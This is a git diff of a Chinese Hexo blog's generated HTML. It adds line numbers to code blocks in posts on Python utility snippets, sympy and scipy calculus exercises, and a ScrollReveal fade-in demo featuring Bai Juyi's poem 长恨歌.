    re.findall(r'(\w+) \1','Merry Merry Christmas Christmas Merry Merry Christmas')
    ['Merry', 'Christmas', 'Merry']
     
    @@ -1594,6 +1592,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Python-\344\270\200\344\272\233\346\210\221\345\270\270\347\224\250\347\232\204\345\260\217\346\223\215\344\275\234/index.html" "b/posts/Python-\344\270\200\344\272\233\346\210\221\345\270\270\347\224\250\347\232\204\345\260\217\346\223\215\344\275\234/index.html" index f85ae44fde..a5af16ba59 100644 --- "a/posts/Python-\344\270\200\344\272\233\346\210\221\345\270\270\347\224\250\347\232\204\345\260\217\346\223\215\344\275\234/index.html" +++ "b/posts/Python-\344\270\200\344\272\233\346\210\221\345\270\270\347\224\250\347\232\204\345\260\217\346\223\215\344\275\234/index.html" @@ -44,8 +44,6 @@ - - @@ -403,13 +401,13 @@

    前言

    ​ 把一些我常用的小操作记录下来,省的用一次上网查一次改一次 orz

    正文

    输出一段 markdown 图片代码

    -
    for i in range(5):
    print('![png](E1.'+ str(i + 1) + '.png)\n')
    -
    ![png](E1.1.png)

    ![png](E1.2.png)

    ![png](E1.3.png)

    ![png](E1.4.png)

    ![png](E1.5.png)

    +
    1
    2
    for i in range(5):
    print('![png](E1.'+ str(i + 1) + '.png)\n')
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    ![png](E1.1.png)

    ![png](E1.2.png)

    ![png](E1.3.png)

    ![png](E1.4.png)

    ![png](E1.5.png)

    批量重命名

    -
    import os

    path = r'd:\Pictures\QQplayerPic'
    label = 'E5'
    for index, file in enumerate(os.listdir(path)):
    os.rename(os.path.join(path,file),os.path.join(path,label + '.' + str(index + 1))+".png")
    +
    1
    2
    3
    4
    5
    6
    import os

    path = r'd:\Pictures\QQplayerPic'
    label = 'E5'
    for index, file in enumerate(os.listdir(path)):
    os.rename(os.path.join(path,file),os.path.join(path,label + '.' + str(index + 1))+".png")

    批量重命名,并将重命名的文件录入剪贴板

    -
    import os
    import pyperclip

    path = r'd:\Pictures\QQplayerPic'
    label = 'E5'
    copy_text = ""
    for index, file in enumerate(os.listdir(path)):
    copy_text += '![png]('+ label + '.' + str(index + 1) + '.png)\n\n'
    os.rename(os.path.join(path,file),os.path.join(path,label + '.' + str(index + 1))+".png")
    pyperclip.copy(copy_text)
    print(copy_text)
    -
    ![png](E5.1.png)

    ![png](E5.2.png)

    ![png](E5.3.png)

    ![png](E5.4.png)

    ![png](E5.5.png)

    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import os
    import pyperclip

    path = r'd:\Pictures\QQplayerPic'
    label = 'E5'
    copy_text = ""
    for index, file in enumerate(os.listdir(path)):
    copy_text += '![png]('+ label + '.' + str(index + 1) + '.png)\n\n'
    os.rename(os.path.join(path,file),os.path.join(path,label + '.' + str(index + 1))+".png")
    pyperclip.copy(copy_text)
    print(copy_text)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    ![png](E5.1.png)

    ![png](E5.2.png)

    ![png](E5.3.png)

    ![png](E5.4.png)

    ![png](E5.5.png)

    @@ -627,6 +625,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Python-\344\272\272\345\267\245\346\231\272\350\203\275\346\225\260\345\255\246\345\237\272\347\241\200(2-4)/index.html" "b/posts/Python-\344\272\272\345\267\245\346\231\272\350\203\275\346\225\260\345\255\246\345\237\272\347\241\200(2-4)/index.html" index 2bf716fe24..ff84dafe84 100644 --- "a/posts/Python-\344\272\272\345\267\245\346\231\272\350\203\275\346\225\260\345\255\246\345\237\272\347\241\200(2-4)/index.html" +++ "b/posts/Python-\344\272\272\345\267\245\346\231\272\350\203\275\346\225\260\345\255\246\345\237\272\347\241\200(2-4)/index.html" @@ -44,8 +44,6 @@ - - @@ -411,24 +409,24 @@

    前言

    1 基础篇

    2 高等数学基础

    例 2.6 求$\lim_{x \to 1}\frac{x ^ 2 - 1}{x - 1}$ 的极限

    -
    import sympy
    from sympy import oo
    import numpy as np
    x = sympy.Symbol('x')
    f = (x ** 2 - 1) / (x - 1)
    sympy.limit(f, x, 1) # limit(数学表达式 expression, 变量 variable, 要趋向的值 value)
    +
    1
    2
    3
    4
    5
    6
    import sympy
    from sympy import oo
    import numpy as np
    x = sympy.Symbol('x')
    f = (x ** 2 - 1) / (x - 1)
    sympy.limit(f, x, 1) # limit(数学表达式 expression, 变量 variable, 要趋向的值 value)

    $\displaystyle 2$

    例 2.11 求$y = arcsin\sqrt{sinx}$的导数

    $y’=\frac{1}{\sqrt{1-sinx} }\cdot\frac{1}{2\sqrt{sinx}}\cdot{cosx}=\frac{cosx}{2\sqrt{sinx-sin^2x}}$

    -
    from sympy import *
    from sympy.abc import x # 导入变量 x
    diff(asin(sqrt(sin(x)))) # diff 求导函数
    +
    1
    2
    3
    from sympy import *
    from sympy.abc import x # 导入变量 x
    diff(asin(sqrt(sin(x)))) # diff 求导函数

    $\displaystyle \frac{\cos{\left(x \right)}}{2 \sqrt{1 - \sin{\left(x \right)}} \sqrt{\sin{\left(x \right)}}}$

    例 2.12 求$f(x,y)=x2+3xy+y2$在点$(1,2)$处的偏导数

    $f_{x}(x,y)=2x+3y$

    $f _{y}(x,y)=3x+2y$

    $ f _{x}(1,2)=2x+3y| _{y=2}^{x=1}=8$

    $f _{y}(1,2)=3x+2y| _{y=2}^{x=1}=7$

    -
    from sympy import *
    from sympy.abc import x, y, f
    f = x ** 2 + 3 * x * y + y ** 2
    diff(f, x) # 对 x 求偏导
    +
    1
    2
    3
    4
    from sympy import *
    from sympy.abc import x, y, f
    f = x ** 2 + 3 * x * y + y ** 2
    diff(f, x) # 对 x 求偏导

    $\displaystyle 2 x + 3 y$

    -
    diff(f, y)
    +
    1
    diff(f, y)

    $\displaystyle 3 x + 2 y$

    -
    fx = diff(f, x)
    fx.evalf(subs={x:1, y:2}) # 以字典的形式传入多个变量的值, 返回计算后的数学表达式。
    +
    1
    2
    fx = diff(f, x)
    fx.evalf(subs={x:1, y:2}) # 以字典的形式传入多个变量的值, 返回计算后的数学表达式。

    $\displaystyle 8.0$

    -
    fy = diff(f, y)
    fy.evalf(subs={x:1, y:2})
    +
    1
    2
    fy = diff(f, y)
    fy.evalf(subs={x:1, y:2})

    $\displaystyle 7.0$

    2.6 方向导数 2.7 梯度

    函数在某点的梯度是一个向量, 它的方向与取得最大方向导数的方向一致

    @@ -447,95 +445,95 @@

    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D
    import numpy as np


    def Fun(x, y): # 原函数
    return x - y + 2 * x * x + 2 * x * y + y * y


    def PxFun(x, y): # 对 x 求偏导
    return 1 + 4 * x + 2 * y


    def PyFun(x, y): # 对 y 求偏导
    return -1 + 2 * x + 2 * y


    if __name__ == "__main__":
    fig = plt.figure() # 创建自定义图象
    # MatplotlibDeprecationWarning: Axes3D(fig) adding itself to the figure is deprecated since 3.4.
    # Pass the keyword argument auto_add_to_figure=False and use fig.add_axes(ax) to suppress this warning.
    # The default value of auto_add_to_figure will change to False in mpl3.5 and True values will no longer work in 3.6.
    ax = Axes3D(fig, auto_add_to_figure=False) # 创建 3D 图象
    fig.add_axes(ax)
    # 在绘制三维图表时, 需要用到 mgrid 函数, 它会返回一个密集的多维网格
    # np.mgrid[开始坐标:结束坐标:步长(步长为复数表示点数,左闭右闭, 步长为实数表示间隔,左闭右开)]
    X, Y = np.mgrid[-2:2:40j, -2:2:40j]
    Z = Fun(X, Y)
    # ax.plot_surface: https://blog.csdn.net/weixin_43584807/article/details/102331755
    # X, Y, Z 2D 数组形式的数据值
    # rstride 数组行距
    # cstride 数组列距
    # cmap 曲面块颜色映射
    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap="rainbow")
    ax.set_xlabel('x') # 设置坐标轴标签
    ax.set_ylabel('y')
    ax.set_zlabel('z')
    # 梯度下降
    step = 0.008 # 取步长
    x = 0 # 初始值
    y = 0
    tag_x = [x] # 绘制图像的列表
    tag_y = [y]
    tag_z = [Fun(x, y)]
    new_x = x
    new_y = y
    Over = False
    while not Over:
    new_x -= step * PxFun(x, y) # 往最大方向减少
    new_y -= step * PyFun(x, y)
    if Fun(x, y) - Fun(new_x, new_y) < 7e-9:
    Over = True
    x = new_x # 更新数据
    y = new_y
    tag_x.append(x) # 添加用于绘制图象的点
    tag_y.append(y)
    tag_z.append(Fun(x, y))
    ax.plot(tag_x, tag_y, tag_z, 'r+]') # 绘制点: 'r'表示红色(好像没有作用?)
    print('(x, y)~(' + str(x) + ',' + str(y) + ')') # 输出结果
    plt.show() # 显示图象

    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D
    import numpy as np


    def Fun(x, y): # 原函数
    return x - y + 2 * x * x + 2 * x * y + y * y


    def PxFun(x, y): # 对 x 求偏导
    return 1 + 4 * x + 2 * y


    def PyFun(x, y): # 对 y 求偏导
    return -1 + 2 * x + 2 * y


    if __name__ == "__main__":
    fig = plt.figure() # 创建自定义图象
    # MatplotlibDeprecationWarning: Axes3D(fig) adding itself to the figure is deprecated since 3.4.
    # Pass the keyword argument auto_add_to_figure=False and use fig.add_axes(ax) to suppress this warning.
    # The default value of auto_add_to_figure will change to False in mpl3.5 and True values will no longer work in 3.6.
    ax = Axes3D(fig, auto_add_to_figure=False) # 创建 3D 图象
    fig.add_axes(ax)
    # 在绘制三维图表时, 需要用到 mgrid 函数, 它会返回一个密集的多维网格
    # np.mgrid[开始坐标:结束坐标:步长(步长为复数表示点数,左闭右闭, 步长为实数表示间隔,左闭右开)]
    X, Y = np.mgrid[-2:2:40j, -2:2:40j]
    Z = Fun(X, Y)
    # ax.plot_surface: https://blog.csdn.net/weixin_43584807/article/details/102331755
    # X, Y, Z 2D 数组形式的数据值
    # rstride 数组行距
    # cstride 数组列距
    # cmap 曲面块颜色映射
    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap="rainbow")
    ax.set_xlabel('x') # 设置坐标轴标签
    ax.set_ylabel('y')
    ax.set_zlabel('z')
    # 梯度下降
    step = 0.008 # 取步长
    x = 0 # 初始值
    y = 0
    tag_x = [x] # 绘制图像的列表
    tag_y = [y]
    tag_z = [Fun(x, y)]
    new_x = x
    new_y = y
    Over = False
    while not Over:
    new_x -= step * PxFun(x, y) # 往最大方向减少
    new_y -= step * PyFun(x, y)
    if Fun(x, y) - Fun(new_x, new_y) < 7e-9:
    Over = True
    x = new_x # 更新数据
    y = new_y
    tag_x.append(x) # 添加用于绘制图象的点
    tag_y.append(y)
    tag_z.append(Fun(x, y))
    ax.plot(tag_x, tag_y, tag_z, 'r+]') # 绘制点: 'r'表示红色(好像没有作用?)
    print('(x, y)~(' + str(x) + ',' + str(y) + ')') # 输出结果
    plt.show() # 显示图象

    (x, y)~(-0.9993608094022046,1.498965767887478)
     

    png

    2.9.5 高手点拨: 求导的三种方式

    已知$f(x)=x5+2x4+3x^2+5$, 求$f’(1)$

    使用 Sympy 的 diff 函数
    -
    import sympy
    from sympy.abc import x, f

    f = x ** 5 + 2 * x ** 4 + 3 * x ** 2 + 5
    fx = sympy.diff(f)
    fx.evalf(subs={x:1})
    +
    1
    2
    3
    4
    5
    6
    import sympy
    from sympy.abc import x, f

    f = x ** 5 + 2 * x ** 4 + 3 * x ** 2 + 5
    fx = sympy.diff(f)
    fx.evalf(subs={x:1})

    $\displaystyle 19.0$

    使用 scipy.misc 模块下的 derivative 函数
    -
    import numpy as np
    from scipy.misc import derivative


    def f(x):
    return x ** 5 + 2 * x ** 4 + 3 * x ** 2 + 5

    derivative(func=f, x0=1, dx=1e-6, n=1) # 函数为 f, 取值为 1, 间距为 1e-6, 一阶导数
    +
    1
    2
    3
    4
    5
    6
    7
    8
    import numpy as np
    from scipy.misc import derivative


    def f(x):
    return x ** 5 + 2 * x ** 4 + 3 * x ** 2 + 5

    derivative(func=f, x0=1, dx=1e-6, n=1) # 函数为 f, 取值为 1, 间距为 1e-6, 一阶导数
    18.999999999991246
     
    使用 NumPy 模块里的 poly1d 构造$f(x)$
    -
    import numpy as np

    p = np.poly1d([1, 2, 0, 3, 0, 5]) # 构造多项式
    np.polyder(p, 1)(1.0) # 一阶导数在 x=1.0 时的取值
    +
    1
    2
    3
    4
    import numpy as np

    p = np.poly1d([1, 2, 0, 3, 0, 5]) # 构造多项式
    np.polyder(p, 1)(1.0) # 一阶导数在 x=1.0 时的取值
    19.0
     
    -
    p.deriv(1)(1.0)  # 一阶导数在 x=1.0 时的取值
    +
    1
    p.deriv(1)(1.0)  # 一阶导数在 x=1.0 时的取值
    19.0
     

    2.10 习题

    $lim_{x\to1}sin(lnx)$
    -
    import sympy
    from sympy.abc import x, f

    f = sympy.sin(sympy.log(x))
    sympy.limit(f, x, 1)
    +
    1
    2
    3
    4
    5
    import sympy
    from sympy.abc import x, f

    f = sympy.sin(sympy.log(x))
    sympy.limit(f, x, 1)

    $\displaystyle 0$

    $lim_{x\to8}\frac{\sqrt[3]{x}-2}{x-8}$
    -
    import sympy
    from sympy.abc import x, f

    f = (x ** (1/3) - 2) / (x - 8)
    sympy.limit(f, x, 8)
    +
    1
    2
    3
    4
    5
    import sympy
    from sympy.abc import x, f

    f = (x ** (1/3) - 2) / (x - 8)
    sympy.limit(f, x, 8)

    $\displaystyle \frac{1}{12}$

    求$y=x4-2x3+5sinx+ln3$的导数
    -
    import sympy
    from sympy.abc import x, y

    y = x ** 4 - 2 * x ** 3 + 5 * sympy.sin(x) + sympy.log(3)
    diff(y)
    +
    1
    2
    3
    4
    5
    import sympy
    from sympy.abc import x, y

    y = x ** 4 - 2 * x ** 3 + 5 * sympy.sin(x) + sympy.log(3)
    diff(y)

    $\displaystyle 4 x^{3} - 6 x^{2} + 5 \cos{\left(x \right)}$

    求$z=(3x2+y2)^{4x+2y}$在点$(1,2)$的偏导数

    $lnz=(4x+2y)\cdot ln(3x2+y2)$

    $\frac1zdz=\left[4ln(3x2+y2)+\frac{24x2+12xy}{3x2+y2}\right]dx+\left[2ln(3x2+y2)+\frac{8xy+2y2}{3x2+y2}\right]dy$

    -
    import sympy
    from sympy.abc import x, y, z

    z = (3 * x ** 2 + y ** 2) ** (4 * x + 2 * y)
    zx = sympy.diff(z, x)
    zx
    +
    1
    2
    3
    4
    5
    6
    import sympy
    from sympy.abc import x, y, z

    z = (3 * x ** 2 + y ** 2) ** (4 * x + 2 * y)
    zx = sympy.diff(z, x)
    zx

    $\displaystyle \left(3 x^{2} + y{2}\right){4 x + 2 y} \left(\frac{6 x \left(4 x + 2 y\right)}{3 x^{2} + y^{2}} + 4 \log{\left(3 x^{2} + y^{2} \right)}\right)$

    -
    zx.evalf(subs={x:1, y:2})
    +
    1
    zx.evalf(subs={x:1, y:2})

    $\displaystyle 84401203.0927369$

    -
    zy = sympy.diff(z, y)
    zy
    +
    1
    2
    zy = sympy.diff(z, y)
    zy

    $\displaystyle \left(3 x^{2} + y{2}\right){4 x + 2 y} \left(\frac{2 y \left(4 x + 2 y\right)}{3 x^{2} + y^{2}} + 2 \log{\left(3 x^{2} + y^{2} \right)}\right)$

    -
    zy.evalf(subs={x:1, y:2})
    +
    1
    zy.evalf(subs={x:1, y:2})

    $\displaystyle 48788945.5463684$

    求方向导数和梯度

    求函数$z=x2+y2$在点$(1,2)$处沿点$(1,2)$到点$(2,2+\sqrt{3})$方向的方向导数, 以及在点$(1,2)$的梯度

    -
    import sympy as sp
    import numpy as np
    from sympy.abc import x, y, z

    z = x ** 2 + y ** 2
    zx, zy = z.diff(x), z.diff(y)
    gradz = np.array([zx.evalf(subs={x:1, y:2}), zy.evalf(subs={x:1, y:2})], dtype=float) # 求梯度
    gradz
    +
    1
    2
    3
    4
    5
    6
    7
    8
    import sympy as sp
    import numpy as np
    from sympy.abc import x, y, z

    z = x ** 2 + y ** 2
    zx, zy = z.diff(x), z.diff(y)
    gradz = np.array([zx.evalf(subs={x:1, y:2}), zy.evalf(subs={x:1, y:2})], dtype=float) # 求梯度
    gradz
    array([2., 4.])
     
    -
    A = np.array([1, 2])
    B = np.array([2, 2 + 3 ** 0.5], dtype=float)
    gradz * (B - A) / np.linalg.norm(B - A) # 计算方向导数
    +
    1
    2
    3
    A = np.array([1, 2])
    B = np.array([2, 2 + 3 ** 0.5], dtype=float)
    gradz * (B - A) / np.linalg.norm(B - A) # 计算方向导数
    array([1.        , 3.46410162])
     

    3 微积分

    例 3.6 定积分

    应用 SciPy 科学计算库求$\int_{0}^{3} cos2(ex)dx$

    -
    import numpy as np
    from scipy.integrate import quad

    func = lambda x:np.cos(np.exp(x)) ** 2 # 定义被积分函数
    quad(func, 0, 3) # 调用 quad 积分函数
    +
    1
    2
    3
    4
    5
    import numpy as np
    from scipy.integrate import quad

    func = lambda x:np.cos(np.exp(x)) ** 2 # 定义被积分函数
    quad(func, 0, 3) # 调用 quad 积分函数
    (1.296467785724373, 1.397797133112089e-09)
     

    输出结果(积分值, 误差)

    例 3.7 二重积分

    求$\iint_{D}e{-xx-y^2}dxdy$, 其中$D=\left { (x,y) | 0 \le x \le 10,0 \le y \le 10\right }$

    -
    import numpy as np
    from scipy.integrate import dblquad # 二重积分


    def integrand(x,y):
    return np.exp(-x ** 2 - y ** 2)

    x_a = 0
    x_b = 10
    y_a = 0
    y_b = 10
    """
    scipy.integrate.dblquad(func, a, b, gfun, hfun, args=(), epsabs=1.49e-08, epsrel=1.49e-08)
    参数:
    func:可调用的
    至少有两个变量的 Python 函数或方法:y 必须是第一个参数,x 必须是第二个参数。

    a, b:浮点数
    x:a < b 的积分极限

    gfun:可调用或浮点数
    y 中的下边界曲线,它是一个函数,采用单个浮点参数 (x) 并返回浮点结果或表示恒定边界曲线的浮点数。

    hfun:可调用或浮点数
    y 中的上边界曲线(与 gfun 的要求相同)。

    args:顺序,可选
    传递给 func 的额外参数。

    epsabs:浮点数,可选
    绝对容差直接传递到内部一维正交积分。默认值为 1.49e-8。dblquad 尝试获得 abs(i-result) <= max(epsabs, epsrel*abs(i)) 的精度,其中 i = 从 gfun(x) 到 hfun(x) 的 func(y, x) 的内部积分,而 result 是数值近似值。请参阅下面的 epsrel。

    epsrel:浮点数,可选
    内部一维积分的相对容差。默认值为 1.49e-8。如果 epsabs <= 0, epsrel 必须大于 5e-29 和 50 * (machine epsilon).看易胜宝更多。

    返回:
    y:浮点数
    结果积分。

    abserr:浮点数
    误差的估计。
    """
    dblquad(integrand, x_a, x_b, lambda x:y_a, lambda x:y_b)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    import numpy as np
    from scipy.integrate import dblquad # 二重积分


    def integrand(x,y):
    return np.exp(-x ** 2 - y ** 2)

    x_a = 0
    x_b = 10
    y_a = 0
    y_b = 10
    """
    scipy.integrate.dblquad(func, a, b, gfun, hfun, args=(), epsabs=1.49e-08, epsrel=1.49e-08)
    参数:
    func:可调用的
    至少有两个变量的 Python 函数或方法:y 必须是第一个参数,x 必须是第二个参数。

    a, b:浮点数
    x:a < b 的积分极限

    gfun:可调用或浮点数
    y 中的下边界曲线,它是一个函数,采用单个浮点参数 (x) 并返回浮点结果或表示恒定边界曲线的浮点数。

    hfun:可调用或浮点数
    y 中的上边界曲线(与 gfun 的要求相同)。

    args:顺序,可选
    传递给 func 的额外参数。

    epsabs:浮点数,可选
    绝对容差直接传递到内部一维正交积分。默认值为 1.49e-8。dblquad 尝试获得 abs(i-result) <= max(epsabs, epsrel*abs(i)) 的精度,其中 i = 从 gfun(x) 到 hfun(x) 的 func(y, x) 的内部积分,而 result 是数值近似值。请参阅下面的 epsrel。

    epsrel:浮点数,可选
    内部一维积分的相对容差。默认值为 1.49e-8。如果 epsabs <= 0, epsrel 必须大于 5e-29 和 50 * (machine epsilon).看易胜宝更多。

    返回:
    y:浮点数
    结果积分。

    abserr:浮点数
    误差的估计。
    """
    dblquad(integrand, x_a, x_b, lambda x:y_a, lambda x:y_b)
    (0.7853981633974476, 1.375309851021853e-08)
     

    例 3.8 定积分近似求解

    用定义法求$\int_{0}^{3} cos2(ex)dx$的近似解

    -
    from numpy import *

    a, b = 0, 3


    def f(x):
    return cos(exp(x)) ** 2


    def trape(n):
    h = (b - a) / n # 将区间分成 n 等分后的长度
    x = a
    sum = 0
    for i in range(1, n):
    x2 = a + i * h
    sum += (f(x) + f(x2)) * h / 2 # 小梯形的值(上底加下底的和乘高除以二)
    x = x2
    return sum
    -
    trape(10)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    from numpy import *

    a, b = 0, 3


    def f(x):
    return cos(exp(x)) ** 2


    def trape(n):
    h = (b - a) / n # 将区间分成 n 等分后的长度
    x = a
    sum = 0
    for i in range(1, n):
    x2 = a + i * h
    sum += (f(x) + f(x2)) * h / 2 # 小梯形的值(上底加下底的和乘高除以二)
    x = x2
    return sum
    +
    1
    trape(10)
    0.944822326405313
     
    -
    trape(100)
    +
    1
    trape(100)
    1.2843391540917448
     
    -
    trape(1000)
    +
    1
    trape(1000)
    1.2960750567338157
     

    不定积分

    $ \int lnx $

    -
    from sympy import *
    from sympy.abc import x

    expr = log(x)
    integrate(expr,x)
    +
    1
    2
    3
    4
    5
    from sympy import *
    from sympy.abc import x

    expr = log(x)
    integrate(expr,x)

    $\displaystyle x \log{\left(x \right)} - x$

    3.8 习题

    $\int _{1}^{2} x^2 + \frac {1}{x^4}dx$

    $ =(\frac {1}{3}x^3 - \frac {1}{3}x^{-3}) | _{1}^{2}$

    $ = \frac {21}{8}$

    -
    import numpy as np
    from scipy.integrate import quad

    func = lambda x: x ** 2 + x ** (-4)
    quad(func, 1, 2)
    +
    1
    2
    3
    4
    5
    import numpy as np
    from scipy.integrate import quad

    func = lambda x: x ** 2 + x ** (-4)
    quad(func, 1, 2)
    (2.625, 2.914335439641036e-14)
     

    $ \int _{-1}^{0}\frac {3x4+3x2+1}{x^2+1}dx$

    $ =\int _{-1}{0}3x2+\frac {1}{1+x^2}dx$

    $ = (x^3 + arctanx)| _{-1}^{0} $

    $ = 1 + \frac{\pi}{4} $

    -
    import numpy as np
    from scipy.integrate import quad

    func = lambda x: (3 * x ** 4 + 3 * x ** 2 + 1) / (1 + x ** 2)
    quad(func, -1, 0)
    +
    1
    2
    3
    4
    5
    import numpy as np
    from scipy.integrate import quad

    func = lambda x: (3 * x ** 4 + 3 * x ** 2 + 1) / (1 + x ** 2)
    quad(func, -1, 0)
    (1.7853981633974483, 1.9821901491273144e-14)
     

    利用定积分的定义计算极限:

    @@ -549,7 +547,7 @@

    例 4.7 根据$e^x$的$n$次泰勒多项式展开式, 计算$e$的近似值

    $ e\approx 1+1+\frac{1}{2!}+\frac{1}{3!}+…+\frac{1}{n!}$

    -
    import numpy as np
    import pandas as pd


    def f(n):
    sum1 = 1
    if n == 0:
    sum1 = 1
    else:
    m = n + 1
    for i in range(1, m):
    sum2 = 1.0
    k = i + 1
    for j in range(1, k):
    sum2 = sum2 * j
    sum1 = sum1 + 1.0 / sum2
    return sum1


    num = 10
    pd.DataFrame(np.array([[i,f(i)] for i in range(1, num + 1)]), columns=['n', 'e'])
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    import numpy as np
    import pandas as pd


    def f(n):
    sum1 = 1
    if n == 0:
    sum1 = 1
    else:
    m = n + 1
    for i in range(1, m):
    sum2 = 1.0
    k = i + 1
    for j in range(1, k):
    sum2 = sum2 * j
    sum1 = sum1 + 1.0 / sum2
    return sum1


    num = 10
    pd.DataFrame(np.array([[i,f(i)] for i in range(1, num + 1)]), columns=['n', 'e'])

    资源

    快速开始

    ​在文章底部,引入这个 js 并选择需要应用效果的 DOM:

    <script src="/js/scrollreveal.js"></script>
    <script>ScrollReveal().reveal('article .poem p');</script>
    <script>ScrollReveal().reveal('article .poem img');</script>

    ​在这些 DOM 进入视口时,便会出现淡入的效果。

    ​然而,这应该会与 Troy-Yang/hexo-lazyload-image: lazyload image plugin for Hexo. 插件冲突。

    演示

    长恨歌

    长恨歌 白居易

    汉皇重色思倾国,御宇多年求不得。

    杨家有女初长成,养在深闺人未识。

    天生丽质难自弃,一朝选在君王侧。

    回眸一笑百媚生,六宫粉黛无颜色。

    春寒赐浴华清池,温泉水滑洗凝脂。

    侍儿扶起娇无力,始是新承恩泽时。

    云鬓花颜金步摇,芙蓉帐暖度春宵。

    春宵苦短日高起,从此君王不早朝。

    承欢侍宴无闲暇,春从春游夜专夜。

    后宫佳丽三千人,三千宠爱在一身。

    金屋妆成娇侍夜,玉楼宴罢醉和春。

    姊妹弟兄皆列土,可怜光彩生门户。

    遂令天下父母心,不重生男重生女。

    骊宫高处入青云,仙乐风飘处处闻。

    缓歌谩舞凝丝竹,尽日君王看不足。

    渔阳鼙鼓动地来,惊破霓裳羽衣曲。

    九重城阙烟尘生,千乘万骑西南行。

    翠华摇摇行复止,西出都门百余里。

    六军不发无奈何,宛转蛾眉马前死。

    花钿委地无人收,翠翘金雀玉搔头。

    君王掩面救不得,回看血泪相和流。

    黄埃散漫风萧索,云栈萦纡登剑阁。

    峨嵋山下少人行,旌旗无光日色薄。

    蜀江水碧蜀山青,圣主朝朝暮暮情。

    行宫见月伤心色,夜雨闻铃肠断声。

    天旋地转回龙驭,到此踌躇不能去。

    马嵬坡下泥土中,不见玉颜空死处。

    君臣相顾尽沾衣,东望都门信马归。

    归来池苑皆依旧,太液芙蓉未央柳。

    芙蓉如面柳如眉,对此如何不泪垂。

    春风桃李花开日,秋雨梧桐叶落时。

    西宫南内多秋草,落叶满阶红不扫。

    梨园弟子白发新,椒房阿监青娥老。

    夕殿萤飞思悄然,孤灯挑尽未成眠。

    迟迟钟鼓初长夜,耿耿星河欲曙天。

    鸳鸯瓦冷霜华重,翡翠衾寒谁与共。

    悠悠生死别经年,魂魄不曾来入梦。

    临邛道士鸿都客,能以精诚致魂魄。

    为感君王辗转思,遂教方士殷勤觅。

    排空驭气奔如电,升天入地求之遍。

    上穷碧落下黄泉,两处茫茫皆不见。

    忽闻海上有仙山,山在虚无缥渺间。

    楼阁玲珑五云起,其中绰约多仙子。

    中有一人字太真,雪肤花貌参差是。

    金阙西厢叩玉扃,转教小玉报双成。

    闻道汉家天子使,九华帐里梦魂惊。

    揽衣推枕起徘徊,珠箔银屏迤逦开。

    云鬓半偏新睡觉,花冠不整下堂来。

    风吹仙袂飘飘举,犹似霓裳羽衣舞。

    玉容寂寞泪阑干,梨花一枝春带雨。

    含情凝睇谢君王,一别音容两渺茫。

    昭阳殿里恩爱绝,蓬莱宫中日月长。

    回头下望人寰处,不见长安见尘雾。

    惟将旧物表深情,钿合金钗寄将去。

    钗留一股合一扇,钗擘黄金合分钿。

    但教心似金钿坚,天上人间会相见。

    临别殷勤重寄词,词中有誓两心知。

    七月七日长生殿,夜半无人私语时。

    在天愿作比翼鸟,在地愿为连理枝。

    天长地久有时尽,此恨绵绵无绝期。

    长恨歌

    ]]> + .poem { border: 2px solid var(--border); padding: 0 5px; } .poem p{ text-align: center; }

    资源

    快速开始

    ​在文章底部,引入这个 js 并选择需要应用效果的 DOM:

    1
    2
    3
    <script src="/js/scrollreveal.js"></script>
    <script>ScrollReveal().reveal('article .poem p');</script>
    <script>ScrollReveal().reveal('article .poem img');</script>

    ​在这些 DOM 进入视口时,便会出现淡入的效果。

    ​然而,这应该会与 Troy-Yang/hexo-lazyload-image: lazyload image plugin for Hexo. 插件冲突。

    演示

    长恨歌

    长恨歌 白居易

    汉皇重色思倾国,御宇多年求不得。

    杨家有女初长成,养在深闺人未识。

    天生丽质难自弃,一朝选在君王侧。

    回眸一笑百媚生,六宫粉黛无颜色。

    春寒赐浴华清池,温泉水滑洗凝脂。

    侍儿扶起娇无力,始是新承恩泽时。

    云鬓花颜金步摇,芙蓉帐暖度春宵。

    春宵苦短日高起,从此君王不早朝。

    承欢侍宴无闲暇,春从春游夜专夜。

    后宫佳丽三千人,三千宠爱在一身。

    金屋妆成娇侍夜,玉楼宴罢醉和春。

    姊妹弟兄皆列土,可怜光彩生门户。

    遂令天下父母心,不重生男重生女。

    骊宫高处入青云,仙乐风飘处处闻。

    缓歌谩舞凝丝竹,尽日君王看不足。

    渔阳鼙鼓动地来,惊破霓裳羽衣曲。

    九重城阙烟尘生,千乘万骑西南行。

    翠华摇摇行复止,西出都门百余里。

    六军不发无奈何,宛转蛾眉马前死。

    花钿委地无人收,翠翘金雀玉搔头。

    君王掩面救不得,回看血泪相和流。

    黄埃散漫风萧索,云栈萦纡登剑阁。

    峨嵋山下少人行,旌旗无光日色薄。

    蜀江水碧蜀山青,圣主朝朝暮暮情。

    行宫见月伤心色,夜雨闻铃肠断声。

    天旋地转回龙驭,到此踌躇不能去。

    马嵬坡下泥土中,不见玉颜空死处。

    君臣相顾尽沾衣,东望都门信马归。

    归来池苑皆依旧,太液芙蓉未央柳。

    芙蓉如面柳如眉,对此如何不泪垂。

    春风桃李花开日,秋雨梧桐叶落时。

    西宫南内多秋草,落叶满阶红不扫。

    梨园弟子白发新,椒房阿监青娥老。

    夕殿萤飞思悄然,孤灯挑尽未成眠。

